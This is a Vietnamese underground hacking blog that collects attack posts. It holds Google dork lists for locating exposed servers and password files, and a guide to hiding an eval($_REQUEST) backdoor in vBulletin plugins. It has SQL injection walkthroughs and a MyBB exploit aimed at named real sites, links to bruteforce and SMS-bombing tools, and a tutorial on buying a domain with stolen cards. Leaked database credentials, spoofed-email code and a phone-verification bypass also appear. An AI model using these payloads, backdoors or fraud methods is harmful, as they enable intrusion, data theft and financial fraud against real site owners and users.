Trang

Google Hacking DataBase (GHDB)

Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.

Footholds

Examples of queries that can help a hacker gain a foothold into a web server

(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login

Files containing usernames

These files contain usernames, but no passwords... Still, google finding usernames on a web site...

site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files

Sensitive Directories

Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!

allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password


Xem Thêm

 

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info


Xem Thêm

 

Share code nháy máy

Nguyên liệu:
- Acc Skype có balance
- Máy đã cài Skype + Apache + php 5.x
- Skype4COM: http://developer.skype.com/resources/Skype4COM.zip

Cách sử dụng:
- Giải nén Skype4COM.zip vào "C:\Program Files\Common Files\Skype\"
- Bật hộp thoại CMD gõ: REGSVR32 C:\Progra~1\Common~1\Skype\Skype4COM.dll xong ấn OK
- Bật Skype, Apache
cuối cùng là đê mô
Highslide JS

Xem Thêm

 

Khai thác site SQL HTML (php biến dạng)

Hôm nay mình làm cho ae cái tut mới

Khai thác sql không phải là php nữa mà là HTML

victim tìm cả đêm lần này là:
http://www.worldwidehealthcenter.net/articles-261.html

Thêm dấu ' vào sau những con số
http://www.worldwidehealthcenter.net/articles-261'.html

haha lỗi rồi


Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Bắt đầu order by
http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html >>ok
http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html >> ok
http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html >> bao loi

>>8-1=7 nhé

bây h union select :
http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html

ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html

Tiếp theo tìm table name
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html

1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html

lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé


Tut by thanggiangho


======================================
Còn đây là site mà anh em tự chiến

http://mayxaydungquoctri.com/san-pha...matsu-117.html

Khai thác tương tự thử xem nhá

Xem Thêm

 

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
Vài site để các bạn test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all


Nguồn: http://junookyo.blogspot.com/search/label/SQL%20Injection?updated-max=2012-09-21T21:06:00-07:00&max-results=20&start=20&by-date=false

Xem Thêm

 

Link Grabber | SQL Injection Scanner cho Chrome

 Download: 
Code:
http://www.mediafire.com/?77nct2ls738zxnd


Pass: sunflowercomeback

Hướng dẫn dùng:
Download -> Giải nén -> Mở Chrome -> Settings (Cài đặt) -> Extensions (Tiện ích mở rộng) -> Bật chế độ dành cho nhà phát triển (Dev Mode) -> Load extension... -> Chọn thư mục "source" vừa giải nén -> Restart lại Chrome --> Mở Google.com -> Điền dork muốn search -> Nhấn vào hình cái đầu lâu ở góc thanh địa chỉ (Nếu lần đầu không đc thì bạn nhấn lại lần 2)


Nguồn: http://junookyo.blogspot.com/search/label/SQL%20Injection?updated-max=2012-09-21T21:06:00-07:00&max-results=20&start=20&by-date=false

Xem Thêm

 

Reiluke Tools

Bộ Tool này gồm 14 em gồm các chức năng sau:
admin finder
blind Sqli
cpanel bruteforcer
duplicate remover
email brute
email checker
exploit scanner
php rapidshare checker
rapidshare checker
sms bomber
sqli column counter
sqliHelper 2.7
steam checker
Link Download:
http://www.mediafire.com/?g3a8eqqu614wzev


Nguồn: http://junookyo.blogspot.com/2012/09/reiluke-tools.html

Xem Thêm

 

Tut đâm domain Yahoo

NOTICE: Để ra mắt cả nhà với nhiệm vụ là admin mới  thì làm cái tut đâm em domain chơi ;)

Nguyên liệu: ccv đủ bl
Sock : cứ IP việt nam mà phang
Làm thôi nào:) đầu tiên vào trang này  http://smallbusiness.yahoo.com/domains

Sau đó làm theo trình tự nhé ;)







Như hình phía dưới là PED nhé :D còn ko thay con cc khác xem :-s mình thay 6 con :))

 

Xem Thêm

 

Bug tin nhắn FaceBook

Thực chất là fake mes thôi
php dưới

?php

$to 
'victim@facebook.com';$subject '';$message 'Hello, hacked by Duong';$header 'From: admin@binhduong-ug.com
Reply-To: admin@binhduong-ug.com'
;$mail mail($to,$subject,$message,$header);

if(
$mail) {
echo 
'Your Email was Sent Succesfully to '.$to;
}
?><hr />
<hr />

Xem Thêm

 

Share Code - data Guester.org 24/10/2012 FORUM UG

admin còn non trẻ quá


http://guester.org/


$config['Database']['dbname'] = 'break_1';


$config['MasterServer']['username'] = 'break_1';

$config['MasterServer']['password'] = 'sida123';

 code : http://www.mediafire.com/?uauzfl46nd35xaj
link data 24/10/2012 : http://www.mediafire.com/?iw5hwjjh3jj5x92

Xem Thêm

 

Tut UG - Verify phone call - cho ai chưa biết !

victim: http://tropo.com
1. anh em vào reg cái níc
2. Đăng nhập. Ấn vào Creat new Application

vào Tropo Scripting. Phần Tropo ScriptinApplication Name: chỉ là tên của app thôi nên điền tên j cũng được

Phần What URL powers your app? thì nháy vào Hosted File chọn Creat new sẽ hiện ra 1 khung và điền vào như sau:
Code:
Mã:

<?php
record("Please", array(
"beep"=>"true",
"timeout"=>10,
"silenceTimeout"=>7,
"maxTime"=>40,
"terminator" => "#",
"recordFormat" => "audio/mp3",
"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"
)
);
?>

3 dòng này thì a e tự điền vào domain của mình
Mã:

"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"

Nhìn là hiểu nhỉ .
Chức năng của đoạn code này là; lúc nó call đến verify, nó sẽ record và lưu về host của mình theo đúng đường dẫn của ftp.. nếu ghi như sau: ftp://thienthan8x.cu.to/tropo.mp3 mà host sd cpanel thì nó sẽ up lên ngay thư mục ngoài ngang hàng với public_html
chọn creat file



Tiếp theo Add a new phone number Chọn state a e muốn rồi add number

Sau đó ấn vào cái dòng có 1 dãy ký tự này rồi chọn Launch taken rồi đợi khoảng 1-2 phút là có thể sd được số phone vừa add kia. lúc verify xong thì lên host down file mp3 kia về nghe đoạn code thôi .

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương